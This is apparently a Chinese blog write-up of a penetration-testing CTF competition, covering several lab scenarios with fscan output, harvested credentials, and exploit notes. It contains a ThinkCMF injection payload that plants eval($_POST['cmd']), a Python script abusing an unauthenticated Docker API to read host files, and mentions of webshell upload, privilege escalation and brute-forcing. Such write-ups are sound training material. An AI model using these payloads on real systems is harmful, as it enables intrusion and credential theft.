本文最后更新于 196 天前,其中的信息可能已经有所发展或是发生改变。
动作太慢,跟不上host✌的操作,但是比去年好多了
没有一个场景是完全打完的,渗透打得太少了
温故而知新
flag * 2
10.119.37.115:3306 open
10.119.37.115:8080 open
10.119.37.115:7680 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://10.119.37.115:8080 code:200 len:11 title:None
[+] PocScan http://10.119.37.115:8080 poc-yaml-phpstudy-backdoor-rce
- 蚁剑配合bp,传个大马进去
192.168.123.66:445 open
192.168.123.66:1433 open
192.168.123.99:445 open
192.168.123.66:139 open
192.168.123.99:139 open
192.168.123.99:135 open
192.168.123.66:135 open
192.168.123.99:3306 open
192.168.123.99:8080 open
[*] alive ports len is: 9
start vulscan
[+] NetInfo:
[*]192.168.123.66
[->]dbserver
[->]10.119.63.244
[->]192.168.123.66
[->]192.168.113.66
[*] WebTitle:http://192.168.123.99:8080 code:200 len:11 title:None
[*] 192.168.123.66 NET\DBSERVER Windows Server 2016 Datacenter 14393
[+] http://192.168.123.99:8080 poc-yaml-phpstudy-backdoor-rce
- config.inc.php
<?php
/*
* Generated configuration file
* Generated by: phpMyAdmin 4.6.2 setup script
* Date: Mon, 07 May 2018 10:48:03 +0000
*/
/* Servers configuration */
$i = 0;
/* Server: mssql [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'mssql';
$cfg['Servers'][$i]['host'] = 'mssql';
$cfg['Servers'][$i]['port'] = 3306;
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'yUzu73pd8bS2JJcb';
/* End of servers configuration */
$cfg['blowfish_secret'] = '';
$cfg['DefaultLang'] = 'en';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';
?>
- 通过mssql进入第二台机器,cs直接getsystem提权
192.168.113.33:139 open
192.168.113.33:53 open
192.168.113.33:88 open
192.168.113.33:80 open
192.168.113.33:464 open
192.168.113.33:445 open
192.168.113.33:135 open
192.168.113.33:389 open
192.168.113.33:593 open
192.168.113.33:636 open
192.168.113.33:3268 open
192.168.113.33:3269 open
192.168.113.33:3389 open
192.168.113.33:5985 open
192.168.113.33:9389 open
192.168.113.33:49692 open
192.168.113.33:49672 open
192.168.113.33:49669 open
192.168.113.33:49668 open
192.168.113.33:49670 open
192.168.113.33:49666 open
192.168.113.33:51491 open
[*] alive ports len is: 22
start vulscan
[+] NetInfo:
[*]192.168.113.33
[->]BDC
[->]192.168.113.33
[->]10.232.180.80
[*] WebTitle:http://192.168.113.33 code:200 len:703 title:IIS Windows Server
[*] WebTitle:http://192.168.113.33:5985 code:404 len:315 title:Not Found
[*] 192.168.113.33 [+]DC NET\BDC Windows Server 2016 Datacenter 14393
[*] 192.168.113.33 (Windows Server 2016 Datacenter 14393)
各显神通
flag * 1
10.119.180.229:80 open
10.119.180.229:3389 open
- 爆破得到
admin/admin888
- ThinkCMF 后台RCE CVE-2019-7580
//在分类管理处添加新分类,只能打一次,不然就重开,就因为第一次测了个phpinfo,导致时间来不及交flag,差几秒
1'=>array(""),eval($_POST["cmd"]),'2
快乐行程
flag * 3
10.119.144.248:22 open
10.119.144.248:3000 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://10.119.144.248:3000 code:200 len:1746 title:YApi-高效、易用、功能强大的可视化接口管理平台
- Yapi NoSQL导致的RCE漏洞
{
"port": "3000",
"adminAccount": "admin@admin.com",
"timeout":120000,
"db": {
"servername": "127.0.0.1",
"DATABASE": "yapi",
"port": 27017,
"user": "admin",
"pass": "123456",
"authSource": ""
},
"mail": {
"enable": true,
"host": "smtp.163.com",
"port": 465,
"from": "***@163.com",
"auth": {
"user": "***@163.com",
"pass": "*****"
}
}
}
sudo -i
提权
192.168.99.77:22 open
192.168.99.77:2375 open
192.168.99.72:22 open
192.168.99.72:3000 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://192.168.99.72:3000 code:200 len:1746 title:YApi-高效、易用、功能强大的可视化接口管理平台
[*] WebTitle: http://192.168.99.77:2375 code:404 len:29 title:None
[+] http://192.168.99.77:2375 poc-yaml-docker-api-unauthorized-rce
[+] http://192.168.99.77:2375 poc-yaml-go-pprof-leak
- docker api 未授权,定时任务弹shell
import docker
client = docker.DockerClient(base_url='http://192.168.99.77:2375/')
data = client.containers.run('alpine:latest',
r'''cat /tmp/root/flag''',
remove=True, volumes={'/': {'bind': '/tmp', 'mode': 'rw'}})
print(data.decode())
[*] WebTitle: http://192.168.66.105:2375 code:404 len:29 title:None
[*] WebTitle: http://192.168.66.33:9200 code:200 len:538 title:None
[+] http://192.168.66.105:2375 poc-yaml-docker-api-unauthorized-rce
[+] http://192.168.66.33:9200 poc-yaml-elasticsearch-unauth
[+] http://192.168.66.105:2375 poc-yaml-go-pprof-leak
yellow open internal d8YjxF5wTm2RaL9Fv6CqYw 1 1 1 0 6.5kb 6.5kb
yellow open casa rjR1j0FcRwWcOXb0H2L6lg 1 1 0 0 208b 208b
yellow open test eNK-IjwKSgi54wZkC5vOJQ 1 1 1 0 3.8kb 3.8kb
yellow open service uGUsn9D3R-uYiZFIa3CCww 1 1 46 0 53kb 53kb
yellow open my_index 6hHWlnRqQSSxzIUl0_arDg 1 1 1 0 4.7kb 4.7kb
yellow open minio SssNCb_sQ62yJgj26YwfMQ 1 1 4 0 12.2kb 12.2kb
yellow open api qffhtqNHRHakTOGAEx9Pew 1 1 2 0 9.2kb 9.2kb
- 在
/root/.ssh/id_rsa
存在私钥,直连第三台
192.168.0.53:445 open
192.168.0.53:139 open
192.168.0.53:135 open
[*] alive ports len is: 3
start vulscan
[*] NetBios 192.168.0.53 WORKGROUP\DESKTOP-4GEUECL
[*] NetInfo
[*]192.168.0.53
[->]DESKTOP-4GEUECL
[->]192.168.0.53
[->]10.223.61.201
elasticsearch
未授权出找到几对用户名密码,爆破出第四台rdp
多年前的约定
flag * 1
10.119.58.123:111 open
10.119.58.123:22 open
10.119.58.123:9876 open
10.119.58.123:10911 open
10.119.58.123:10912 open
10.119.58.123:10909 open
- CVE-2023-33246
192.168.17.77:593 open
192.168.17.77:465 open
192.168.17.77:25 open
192.168.17.77:443 open
192.168.17.77:587 open
192.168.17.77:444 open
192.168.17.77:445 open
192.168.17.77:135 open
192.168.17.77:475 open
192.168.17.77:477 open
192.168.17.77:476 open
192.168.17.77:53 open
192.168.17.77:464 open
192.168.17.77:139 open
192.168.17.77:88 open
192.168.17.77:80 open
192.168.17.77:81 open
192.168.17.77:717 open
192.168.17.77:636 open
192.168.17.77:389 open
192.168.17.77:808 open
192.168.17.77:890 open
192.168.17.77:1801 open
192.168.17.77:2107 open
192.168.17.77:2103 open
192.168.17.77:2105 open
192.168.17.77:2525 open
192.168.17.77:3268 open
192.168.17.77:3269 open
192.168.17.77:3389 open
192.168.17.77:3803 open
192.168.17.77:3800 open
192.168.17.77:3801 open
192.168.17.77:3843 open
192.168.17.77:3823 open
192.168.17.77:3828 open
192.168.17.77:3875 open
192.168.17.77:3867 open
192.168.17.77:3863 open
192.168.17.77:5060 open
192.168.17.77:5062 open
192.168.17.77:5065 open
192.168.17.77:5985 open
192.168.17.77:6001 open
192.168.17.77:6034 open
192.168.17.77:6042 open
192.168.17.77:6083 open
192.168.17.77:6402 open
192.168.17.77:6407 open
192.168.17.77:6409 open
192.168.17.77:6405 open
192.168.17.77:6406 open
192.168.17.77:6403 open
192.168.17.77:6400 open
192.168.17.77:6401 open
192.168.17.77:6412 open
192.168.17.77:6419 open
192.168.17.77:6428 open
192.168.17.77:6453 open
192.168.17.77:6469 open
192.168.17.77:6472 open
192.168.17.77:6481 open
192.168.17.77:6480 open
192.168.17.77:6483 open
192.168.17.77:6482 open
192.168.17.77:6486 open
192.168.17.77:6494 open
192.168.17.77:6497 open
192.168.17.77:6502 open
192.168.17.77:6509 open
192.168.17.77:6522 open
192.168.17.77:6529 open
192.168.17.77:6532 open
192.168.17.77:6546 open
192.168.17.77:6547 open
192.168.17.77:6556 open
192.168.17.77:6559 open
192.168.17.77:6586 open
192.168.17.77:6587 open
192.168.17.77:6598 open
192.168.17.77:6608 open
192.168.17.77:6680 open
192.168.17.77:6682 open
192.168.17.77:6691 open
192.168.17.77:6693 open
192.168.17.77:7227 open
192.168.17.77:8172 open
192.168.17.77:9389 open
192.168.17.77:9710 open
192.168.17.77:13634 open
192.168.17.77:22366 open
192.168.17.77:22367 open
192.168.17.77:22389 open
192.168.17.77:22408 open
192.168.17.77:22418 open
192.168.17.77:22423 open
192.168.17.77:22462 open
192.168.17.77:22494 open
192.168.17.77:35384 open
192.168.17.77:35399 open
192.168.17.77:47001 open
192.168.17.77:64327 open
192.168.17.77:64337 open
[*] alive ports len is: 103
start vulscan
[*] WebTitle http://192.168.17.77:81 code:403 len:1157 title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle http://192.168.17.77:3800 code:404 len:315 title:Not Found
[*] WebTitle http://192.168.17.77:5985 code:404 len:315 title:Not Found
[*] WebTitle http://192.168.17.77 code:403 len:0 title:None
[*] WebTitle http://192.168.17.77:47001 code:404 len:315 title:Not Found
[*] NetBios 192.168.17.77 [+] DC:owa.ctfsec.local Windows Server 2016 Datacenter 14393
[*] OsInfo 192.168.17.77 (Windows Server 2016 Datacenter 14393)
[*] WebTitle https://192.168.17.77 code:302 len:0 title:None 跳转url: https://192.168.17.77/owa/
[*] WebTitle https://192.168.17.77:8172 code:404 len:0 title:None
[*] WebTitle https://192.168.17.77/owa/auth/logon.aspx?url=https%3a%2f%2f192.168.17.77%2fowa%2f&reason=0 code:200 len:28244 title:Outlook
[*] WebTitle https://192.168.17.77:444 code:500 len:3367 title:运行时错误